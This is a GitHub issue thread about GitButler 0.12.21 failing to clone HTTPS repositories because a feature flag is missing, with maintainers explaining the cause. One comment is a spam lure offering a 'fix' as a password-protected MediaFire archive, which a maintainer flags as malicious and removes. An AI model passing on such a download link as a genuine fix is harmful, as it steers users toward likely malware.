### ISSUE TITLE
Clone a repository not work: 'https' is not compiled in

### ISSUE THREAD

**Issue by Zamoca42** [gitbutlerapp/gitbutler#4778] opened 2024-08-28 06:37 UTC
### Version

0.12.21

### Operating System

Mac OS X

### Distribution Method

dmg (Apple Silicon)

### Describe the issue

When attempting to clone a repository using GitButler, an error occurs stating that 'https' is not compiled in. 

<img width="700" alt="스크린샷 2024-08-28 오후 3 16 26" src="https://github.com/user-attachments/assets/a58fc92b-ecae-4094-93e0-40e1b2f8dfc2">

<img width="700" alt="스크린샷 2024-08-28 오후 3 13 54" src="https://github.com/user-attachments/assets/7f599717-e9c0-4b19-a0b8-d2b8a03a0239">

This prevents cloning repositories using HTTPS URLs.

### How to reproduce

1. Open GitButler version 0.12.21
2. Navigate to the repository cloning interface
3. Enter a valid HTTPS repository URL (e.g., https://github.com/nextauthjs/next-auth.git)
4. Select a destination folder (e.g., /Users/zamoca/dev)
5. Click "Clone" or "Retry clone"

### Expected behavior

Given that the input placeholder suggests using 'https://' for repository URLs, I expected to be able to clone repositories starting with 'https://'. 
However, instead of successfully cloning the repository, I encountered an error message indicating that HTTPS support is not compiled in.

### Relevant log output

```shell
Error: 'https' is not compiled in. Compile with the 'http-client-curl' or 'http-client-reqwest' cargo feature
```

**Comment by Evul88** [comment] 2024-08-28 06:39
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by krlvi** [comment] 2024-08-28 07:01
Thank you for reporting this @Zamoca42 - in the 0.12.21 we made some changes to how cloning is done (now using https://github.com/Byron/gitoxide) and I think the issue is that we missed to add a feature flag. This should be something that we can have fixed with the next release.

Separately, thank you for promptly reporting the spam comment - definitely appeared malicious, I have removed it

**Closed** 2024-08-28 11:24 UTC
Labels: bug, 🎉reproduced🎉

**Comment by Caleb-T-Owens** [comment] 2024-08-28 14:43
Yikes... this worked in testing 🤔. @Byron Is there something different between debug and release builds?

**Comment by Byron** [comment] 2024-08-28 17:27
No, it's all dependent on cargo features, and these don't differ between the build profiles. I have no clue how this could slip through.
